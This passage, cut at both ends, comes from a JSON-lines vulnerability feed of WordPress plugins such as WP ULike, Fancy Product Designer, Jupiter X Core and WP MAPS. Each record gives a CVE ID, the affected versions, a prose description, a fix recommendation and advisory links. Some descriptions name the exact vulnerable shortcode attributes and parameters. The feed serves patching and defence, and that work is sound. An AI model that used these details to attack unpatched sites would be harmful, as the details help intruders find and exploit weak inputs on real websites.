version","refs":"[{\"url\":\"https:\\\/\\\/docs.stylemixthemes.com\\\/masterstudy-lms\\\/changelog-pro-version\",\"name\":\"https:\\\/\\\/docs.stylemixthemes.com\\\/masterstudy-lms\\\/changelog-pro-version\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/stylemixthemes.com\\\/wordpress-lms-plugin\\\/\",\"name\":\"https:\\\/\\\/stylemixthemes.com\\\/wordpress-lms-plugin\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/masterstudy-education-center-wordpress-theme\\\/12170274\\\/\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/masterstudy-education-center-wordpress-theme\\\/12170274\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c170a228-4abd-4ee6-ba37-bdcde1cb7fc5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c170a228-4abd-4ee6-ba37-bdcde1cb7fc5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6094","slug":"wp-ulike","versionImpact":"4.7.0","versionEndExcluding":"4.7.1","description":"The WP ULike  WordPress plugin before 4.7.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/019b3f34-7b85-4728-8dd7-ca472d6b2d06\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/019b3f34-7b85-4728-8dd7-ca472d6b2d06\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5595","slug":"essential-blocks","versionImpact":"4.6.1","versionEndExcluding":"4.7.0","description":"The Essential Blocks  WordPress plugin before 4.7.0 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 4.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f2b8f092-4fc0-4edc-ba0f-d4312c2e5dec\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f2b8f092-4fc0-4edc-ba0f-d4312c2e5dec\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1797","slug":"wp-ulike","versionImpact":"4.6.9","versionEndExcluding":"4.7.0","description":"The WP ULike \u2013 Most Advanced WordPress Marketing Toolkit plugin for WordPress is vulnerable to SQL Injection via the 'status' and 'id' attributes of the 'wp_ulike_counter' and 'wp_ulike' shortcodes in all versions up to, and including, 4.6.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 4.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d225dee1-305c-4378-bc07-192347a0c838?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d225dee1-305c-4378-bc07-192347a0c838?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3052611%40wp-ulike&new=3052611%40wp-ulike&sfp_email=&sfph_mail=#file43\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3052611%40wp-ulike&new=3052611%40wp-ulike&sfp_email=&sfph_mail=#file43\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1759","slug":"wp-ulike","versionImpact":"4.6.9","versionEndExcluding":"4.7.0","description":"The WP ULike \u2013 Most Advanced WordPress Marketing Toolkit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via a user's display name in all versions up to, and including, 4.6.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d844ca83-84e5-4b6c-ae26-f300c7328d78?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d844ca83-84e5-4b6c-ae26-f300c7328d78?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3052611\\\/wp-ulike\\\/trunk\\\/admin\\\/classes\\\/class-wp-ulike-widget.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3052611\\\/wp-ulike\\\/trunk\\\/admin\\\/classes\\\/class-wp-ulike-widget.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1572","slug":"wp-ulike","versionImpact":"4.6.9","versionEndExcluding":"4.7.0","description":"The WP ULike plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp_ulike' shortcode in all versions up to, and including, 4.6.9 due to insufficient input sanitization and output escaping on the user supplied 'wrapper_class' attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4deb1527-0637-44f2-b336-d0cf2a48fa52?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4deb1527-0637-44f2-b336-d0cf2a48fa52?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ulike\\\/tags\\\/4.6.9\\\/includes\\\/functions\\\/templates.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ulike\\\/tags\\\/4.6.9\\\/includes\\\/functions\\\/templates.php#L70\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3052611\\\/wp-ulike\\\/trunk\\\/includes\\\/classes\\\/class-wp-ulike-cta-template.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3052611\\\/wp-ulike\\\/trunk\\\/includes\\\/classes\\\/class-wp-ulike-cta-template.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4334","slug":"fancy-product-designer","versionImpact":"4.6.9","versionEndExcluding":"4.7.0","description":"The Fancy Product Designer plugin for WordPress is vulnerable to unauthorized modification of site options due to a missing capability check on the fpd_update_options function in versions up to, and including, 4.6.9. This makes it possible for authenticated attackers with subscriber-level permissions to modify site options, including setting the default role to administrator which can allow privilege escalation.","recommendation":"Update to version 4.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea097cb7-85f4-4b6d-9f29-bc2636993f21?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea097cb7-85f4-4b6d-9f29-bc2636993f21?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/support.fancyproductdesigner.com\\\/support\\\/discussions\\\/topics\\\/13000029981\",\"name\":\"https:\\\/\\\/support.fancyproductdesigner.com\\\/support\\\/discussions\\\/topics\\\/13000029981\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0765","slug":"gallery-plugin","versionEndExcluding":"4.7.0","description":"The Gallery by BestWebSoft WordPress plugin before 4.7.0 does not properly escape values used in SQL queries, leading to an Blind SQL Injection vulnerability. The attacker must have at least the privileges of an Author, and the vendor's Slider plugin (https:\/\/wordpress.org\/plugins\/slider-bws\/) must also be installed for this vulnerability to be exploitable.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2699cefa-1cae-4ef3-ad81-7f3db3fcce25\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2699cefa-1cae-4ef3-ad81-7f3db3fcce25\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0764","slug":"gallery-plugin","versionEndExcluding":"4.7.0","description":"The Gallery by BestWebSoft WordPress plugin before 4.7.0 does not perform proper sanitization of gallery information, leading to a Stored Cross-Site Scription vulnerability. The attacker must have at least the privileges of the Author role.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d48c6c50-3734-4191-9833-0d9b09b1bd8a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d48c6c50-3734-4191-9833-0d9b09b1bd8a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4335","slug":"fancy-product-designer","versionImpact":"4.6.9","versionEndExcluding":"4.7.0","description":"The Fancy Product Designer plugin for WordPress is vulnerable to unauthorized access to data and modification of plugin settings due to a missing capability check on multiple AJAX functions in versions up to, and including, 4.6.9. This makes it possible for authenticated attackers with subscriber-level permissions to modify plugin settings, including retrieving arbitrary order information or creating\/updating\/deleting products, orders, or other sensitive information not associated with their own account.","recommendation":"Update to version 4.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/644624d8-c193-4ee6-bc82-7ccda5d7f2ac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/644624d8-c193-4ee6-bc82-7ccda5d7f2ac?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/support.fancyproductdesigner.com\\\/support\\\/discussions\\\/topics\\\/13000029981\",\"name\":\"https:\\\/\\\/support.fancyproductdesigner.com\\\/support\\\/discussions\\\/topics\\\/13000029981\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12323","slug":"turbosmtp","versionImpact":"4.6","versionEndExcluding":"4.7","description":"The turboSMTP plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018page\u2019 parameter in all versions up to, and including, 4.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link while logged in to turboSMTP.","recommendation":"Update to version 4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/turbosmtp\\\/trunk\\\/turbo-stats-section.php#L209\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/turbosmtp\\\/trunk\\\/turbo-stats-section.php#L209\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205021\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205021\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cca9f71c-42e6-416f-94f2-cb79bbdfc69a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cca9f71c-42e6-416f-94f2-cb79bbdfc69a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6243","slug":"eventon","versionImpact":"4.6.8","versionEndExcluding":"4.7","description":"The EventON PRO - WordPress Virtual Event Calendar Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.6.8. This is due to missing or incorrect nonce validation on the admin_test_email function. This makes it possible for unauthenticated attackers to send test emails to arbitrary email addresses via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d0a40f8-4c31-447d-ac28-73cfe7a07687?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d0a40f8-4c31-447d-ac28-73cfe7a07687?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3017939%40eventon-lite&new=3017939%40eventon-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3017939%40eventon-lite&new=3017939%40eventon-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/docs.myeventon.com\\\/documentations\\\/eventon-changelog\\\/\",\"name\":\"https:\\\/\\\/docs.myeventon.com\\\/documentations\\\/eventon-changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11781","slug":"smart-agenda-prise-de-rendez-vous-en-ligne","versionImpact":"4.6","versionEndExcluding":"4.7","description":"The Smart Agenda \u2013 Prise de rendez-vous en ligne plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'smartagenda' shortcode in all versions up to, and including, 4.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201483%40smart-agenda-prise-de-rendez-vous-en-ligne&new=3201483%40smart-agenda-prise-de-rendez-vous-en-ligne&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201483%40smart-agenda-prise-de-rendez-vous-en-ligne&new=3201483%40smart-agenda-prise-de-rendez-vous-en-ligne&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a7bb274-9bbf-4d78-ad81-0e7ac6b7b265?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a7bb274-9bbf-4d78-ad81-0e7ac6b7b265?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10885","slug":"searchiq","versionImpact":"4.6","versionEndExcluding":"4.7","description":"The SearchIQ \u2013 The Search Solution plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'siq_searchbox' shortcode in all versions up to, and including, 4.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/searchiq\\\/tags\\\/4.6\\\/library\\\/shortcode.php#L66\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/searchiq\\\/tags\\\/4.6\\\/library\\\/shortcode.php#L66\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198694\\\/searchiq\\\/trunk\\\/library\\\/shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198694\\\/searchiq\\\/trunk\\\/library\\\/shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86e8e16f-9d93-457a-9093-2fd236e51682?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86e8e16f-9d93-457a-9093-2fd236e51682?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13356","slug":"dsgvo-all-in-one-for-wp","versionImpact":"4.6","versionEndExcluding":"4.7","description":"The DSGVO All in one for WP plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.6. This is due to missing or incorrect nonce validation in the user_remove_form.php file. This makes it possible for unauthenticated attackers to delete admin user accounts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dsgvo-all-in-one-for-wp\\\/trunk\\\/core\\\/inc\\\/user_remove_form.php#L25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dsgvo-all-in-one-for-wp\\\/trunk\\\/core\\\/inc\\\/user_remove_form.php#L25\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3233492\\\/dsgvo-all-in-one-for-wp\\\/trunk\\\/core\\\/inc\\\/user_remove_form.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3233492\\\/dsgvo-all-in-one-for-wp\\\/trunk\\\/core\\\/inc\\\/user_remove_form.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2efe885d-7e17-4057-abde-37482047facb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2efe885d-7e17-4057-abde-37482047facb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4919","slug":"iframe","versionImpact":"4.6","versionEndExcluding":"4.7","description":"The iframe plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `iframe` shortcode in versions up to, and including, 4.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permission and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This was partially patched in version 4.6 and fully patched in version 4.7.","recommendation":"Update to version 4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iframe\\\/tags\\\/4.5\\\/iframe.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iframe\\\/tags\\\/4.5\\\/iframe.php#L40\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iframe\\\/tags\\\/4.5\\\/iframe.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iframe\\\/tags\\\/4.5\\\/iframe.php#L28\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3706deed-55f2-4dfb-bfed-7a14872cd15a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3706deed-55f2-4dfb-bfed-7a14872cd15a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970787\\\/iframe#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970787\\\/iframe#file4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-45640","slug":"wp-ulike","versionImpact":"4.6.8","versionEndExcluding":"4.6.9","description":"Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in TechnoWich WP ULike \u2013 Most Advanced WordPress Marketing Toolkit plugin <=\u00a04.6.8 versions.","recommendation":"Update to version 4.6.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-ulike\\\/wordpress-wp-ulike-plugin-4-6-8-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-ulike\\\/wordpress-wp-ulike-plugin-4-6-8-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7772","slug":"jupiterx-core","versionImpact":"4.6.5","versionEndExcluding":"4.6.6","description":"The Jupiter X Core plugin for WordPress is vulnerable to arbitrary file uploads due to a mishandled file type validation in the 'validate' function in all versions up to, and including, 4.6.5. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 4.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b546d24-82c1-4598-8926-6e73a4784b38?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b546d24-82c1-4598-8926-6e73a4784b38?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/modules\\\/forms\\\/classes\\\/ajax-handler.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/modules\\\/forms\\\/classes\\\/ajax-handler.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139412\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139412\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36841","slug":"woocommerce-smart-coupons","versionEndExcluding":"4.6.5","description":"The WooCommerce Smart Coupons plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the woocommerce_coupon_admin_init function in versions up to, and including, 4.6.0. This makes it possible for unauthenticated attackers to send themselves gift certificates of any value, which could be redeemed for products sold on the victim\u2019s storefront.","recommendation":"Update to version 4.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eeeb03f7-5f78-4462-b0b4-5080bbc419a3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eeeb03f7-5f78-4462-b0b4-5080bbc419a3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2020\\\/03\\\/coupon-creation-vulnerability-patched-in-woocommerce-smart-coupons\\\/\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2020\\\/03\\\/coupon-creation-vulnerability-patched-in-woocommerce-smart-coupons\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4447","slug":"essential-addons-for-elementor-lite","versionImpact":"4.6.4","versionEndExcluding":"4.6.5","description":"The Essential Addons for Elementor  plugin for WordPress is vulnerable to privilege escalation in versions up to and including 4.6.4 due to a lack of restrictions on who can add a registration form and a custom registration role to an Elementor created page. This makes it possible for attackers with access to the Elementor page builder to create a new registration form that defaults to the user role being set to administrator and subsequently register as an administrative user.","recommendation":"Update to version 4.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be098ee9-b749-4908-85e8-e717d019609a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be098ee9-b749-4908-85e8-e717d019609a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2526471%40essential-addons-for-elementor-lite&new=2526471%40essential-addons-for-elementor-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2526471%40essential-addons-for-elementor-lite&new=2526471%40essential-addons-for-elementor-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4446","slug":"essential-addons-for-elementor-lite","versionImpact":"4.6.4","versionEndExcluding":"4.6.5","description":"The Essential Addons for Elementor plugin for WordPress is vulnerable to authorization bypass in versions up to and including 4.6.4 due to missing capability checks and nonce disclosure. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to perform many unauthorized actions such as changing settings and installing arbitrary plugins.","recommendation":"Update to version 4.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/283fb581-8b61-4008-a5c4-2e1490fab33e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/283fb581-8b61-4008-a5c4-2e1490fab33e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2526471%40essential-addons-for-elementor-lite&new=2526471%40essential-addons-for-elementor-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2526471%40essential-addons-for-elementor-lite&new=2526471%40essential-addons-for-elementor-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-34013","slug":"poll-maker","versionEndExcluding":"4.6.3","description":"Server-Side Request Forgery (SSRF) vulnerability in Poll Maker Team Poll Maker \u2013 Best WordPress Poll Plugin.This issue affects Poll Maker \u2013 Best WordPress Poll Plugin: from n\/a through 4.6.2.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/poll-maker\\\/wordpress-poll-maker-plugin-4-6-2-server-side-request-forgery-ssrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/poll-maker\\\/wordpress-poll-maker-plugin-4-6-2-server-side-request-forgery-ssrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4594","slug":"tournamatch","versionImpact":"4.6.1","versionEndExcluding":"4.6.2","description":"The Tournamatch plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'trn-ladder-registration-button' shortcode in all versions up to, and including, 4.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tournamatch\\\/tags\\\/4.6.1\\\/includes\\\/shortcodes\\\/class-shortcodes.php#L273\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tournamatch\\\/tags\\\/4.6.1\\\/includes\\\/shortcodes\\\/class-shortcodes.php#L273\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3295681\\\/tournamatch\\\/trunk\\\/includes\\\/shortcodes\\\/class-shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3295681\\\/tournamatch\\\/trunk\\\/includes\\\/shortcodes\\\/class-shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc912831-bbdd-4f8f-a620-47e41b1b731d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc912831-bbdd-4f8f-a620-47e41b1b731d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2386","slug":"wp-google-map-plugin","versionImpact":"4.6.1","versionEndExcluding":"4.6.2","description":"The WordPress Plugin for Google Maps \u2013 WP MAPS plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter of the 'put_wpgm' shortcode in all versions up to, and including, 4.6.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 4.6.2, or a newer patched 